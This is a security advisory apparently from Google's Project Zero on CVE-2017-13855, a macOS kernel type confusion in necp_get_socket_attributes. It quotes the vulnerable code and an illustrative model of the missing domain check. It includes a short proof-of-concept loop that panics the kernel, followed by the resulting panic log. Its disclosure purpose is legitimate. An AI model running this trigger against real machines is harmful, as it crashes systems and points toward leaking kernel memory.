macOS necp_get_socket_attributes so_pcb Type Confusion
Source: Google Security Research  Author: jannh  Published: 2017-12-12
MacOS so_pcb type confusion in necp_get_socket_attributes 

CVE-2017-13855


When setsockopt() is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.
necp_get_socket_attributes() unconditionally calls sotoinpcb(so):

    errno_t
    necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)
    {
            int error = 0;
            u_int8_t *buffer = NULL;
            u_int8_t *cursor = NULL;
            size_t valsize = 0;
            struct inpcb *inp = sotoinpcb(so);

            if (inp->inp_necp_attributes.inp_domain != NULL) {
                    valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);
            }
    [...]
    }

sotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):

    #define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)

If necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).
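The following is an added illustration, not code from the bug report or from XNU: a constructed, simplified model of the two PCB types and of the domain check that prevents the cast. All struct names, field layouts and the `MODEL_PF_*` constants are stand-ins invented for the example; only the shape of the problem (an unconditional cast of `so_pcb` to the larger `struct inpcb`) follows the report above.

```c
/* Constructed model (not XNU source) of the so_pcb type confusion and of a
 * domain check that prevents it. Struct layouts and names are simplified
 * stand-ins for the real kernel structures. */
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical protocol-family values for the model. */
enum { MODEL_PF_UNIX = 1, MODEL_PF_INET = 2, MODEL_PF_INET6 = 30 };

/* Small PCB: what so_pcb of an AF_UNIX socket really points at. */
struct model_unpcb {
    uint32_t unp_flags;
    uint32_t unp_gencnt;
};

/* Large PCB: what the unchecked cast assumes so_pcb points at. */
struct model_inpcb {
    uint8_t     pad[64];        /* stands in for the fields before the NECP attributes */
    const char *inp_domain;     /* the pointer necp_get_socket_attributes() dereferences */
};

struct model_socket {
    int   so_domain;            /* protocol family the socket was created with */
    void *so_pcb;               /* control block; its real type depends on so_domain */
};

/* Same shape as the XNU macro quoted in the report: a cast with no type check. */
#define model_sotoinpcb(so) ((struct model_inpcb *)(so)->so_pcb)

/* How far past the end of the real unpcb the unchecked read of inp_domain
 * lands when the cast is applied to an AF_UNIX socket. A positive value means
 * the access is out of bounds of the object so_pcb actually points at. */
size_t unchecked_overread_bytes(void)
{
    size_t read_end = offsetof(struct model_inpcb, inp_domain) + sizeof(const char *);
    return read_end - sizeof(struct model_unpcb);
}

/* Hardened pattern: refuse any socket whose so_pcb is not an inpcb before
 * casting. Returns 0 and stores the domain length on success, EINVAL otherwise. */
int necp_attr_domain_len_checked(const struct model_socket *so, size_t *out_len)
{
    if (so == NULL || out_len == NULL)
        return EINVAL;
    /* The check the vulnerable code lacked: only INET/INET6 sockets carry an inpcb. */
    if (so->so_domain != MODEL_PF_INET && so->so_domain != MODEL_PF_INET6)
        return EINVAL;
    struct model_inpcb *inp = model_sotoinpcb(so);
    if (inp == NULL)
        return EINVAL;
    *out_len = inp->inp_domain ? strlen(inp->inp_domain) : 0;
    return 0;
}

int main(void)
{
    /* Constructed sample sockets: one AF_UNIX, one AF_INET. */
    struct model_unpcb unp = { 0, 0 };
    struct model_socket unix_sock = { MODEL_PF_UNIX, &unp };

    struct model_inpcb inp;
    memset(&inp, 0, sizeof inp);
    inp.inp_domain = "example.test";
    struct model_socket inet_sock = { MODEL_PF_INET, &inp };

    size_t len = 0;
    printf("unchecked cast on AF_UNIX reads %zu bytes past the real pcb\n",
           unchecked_overread_bytes());
    printf("checked, AF_UNIX: rc=%d\n", necp_attr_domain_len_checked(&unix_sock, &len));
    printf("checked, AF_INET: rc=%d len=%zu\n",
           necp_attr_domain_len_checked(&inet_sock, &len), len);
    return 0;
}
```

The point of the model is the ordering: the protocol family is checked before `so_pcb` is reinterpreted, so a `struct unpcb` is never read as a `struct inpcb`, and `unchecked_overread_bytes()` shows why the unconditional cast reads beyond the smaller object.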


To trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).

==============
#include <sys/types.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <err.h>
#include <unistd.h>

/* NECP socket option number; not in the public SDK headers, so defined here. */
#define SO_NECP_ATTRIBUTES 0x1109

int main(void) {
  while (1) {
    /* AF_UNIX: so_pcb is a struct unpcb, not the struct inpcb NECP expects. */
    int s = socket(AF_UNIX, SOCK_STREAM, 0);
    if (s == -1)
      err(1, "socket");
    /* Reaches necp_get_socket_attributes(), which casts so_pcb unconditionally. */
    getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);
    close(s);
  }
}
==============

On macOS 10.13 (17A405), this causes the following crash:

==============
*** Panic Report ***
panic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:
CR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0
RAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc
RSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8
R8:  0x0000000000000001, R9:  0xffffffff00000000, R10: 0x0000000000000000, R11: 0x0000000000000246
R12: 0xffffff80357cf7d0, R13: 0xffffff8032d69a08, R14: 0xffffff8018de3ef0, R15: 0xffffff8032ac66a8
RFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS:  0x0000000000000008, SS:  0x0000000000000010
Fault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1
==============

This bug should be usable for disclosing kernel memory.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.



Found by: jannh
